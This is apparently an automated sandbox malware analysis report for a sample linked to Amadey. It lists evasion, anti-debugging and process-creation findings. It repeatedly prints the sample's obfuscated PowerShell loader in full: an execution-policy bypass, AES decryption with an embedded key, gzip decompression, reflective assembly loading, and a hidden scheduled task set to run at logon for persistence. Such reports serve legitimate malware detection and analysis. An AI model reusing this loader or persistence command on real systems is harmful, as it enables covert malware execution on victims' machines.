Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6544	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6008	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2780	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220	Thread sleep count: 3659 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220	Thread sleep count: 3368 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3936	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1076	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5616	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00A2BA94
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00A3D420
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A4C508 FindFirstFileExA,	0_2_00A4C508

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A3F82F VirtualQuery,GetSystemInfo,

0_2_00A3F82F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000004.00000002.2095931954.0000000007550000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ld
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: wscript.exe, 00000007.00000003.2050241439.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: wscript.exe, 00000007.00000003.2051343769.0000000002F39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000005.00000002.2035279040.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000B.00000002.3308194663.0000000008780000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWt
Source: wscript.exe, 00000008.00000002.2067544754.000001CE38611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: jcgLYlM4dg.exe, 00000000.00000002.2124170830.0000000003183000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 0000000B.00000002.3308194663.0000000008780000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3308194663.0000000008770000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.2035279040.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00A40A0A

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A491B0 mov eax, dword ptr fs:[00000030h]

0_2_00A491B0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A4D1F0 GetProcessHeap,

0_2_00A4D1F0

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A40A0A
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A40B9D SetUnhandledExceptionFilter,	0_2_00A40B9D
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A40D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00A40D8A
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A44FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A44FEF

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match	File source: amsi32_6640.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_2636.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_576.amsi.csv, type: OTHER

.NET source code references suspicious native API functions

Source: 4.2.powershell.exe.9b90738.4.raw.unpack, Program.cs	Reference to suspicious API methods: VirtualProtect(intPtr, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Reference to suspicious API methods: LoadLibrary("ntdll.dll")
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Reference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\local\temp\rarsfx0\amadey.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\rarsfx0\amadey.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'runtimebroker_startup_958_str' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\startup_str_958.vbs') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_958.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_958.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_958.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_958.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\local\temp\rarsfx0\amadey.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\rarsfx0\amadey.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'runtimebroker_startup_958_str' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\startup_str_958.vbs') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 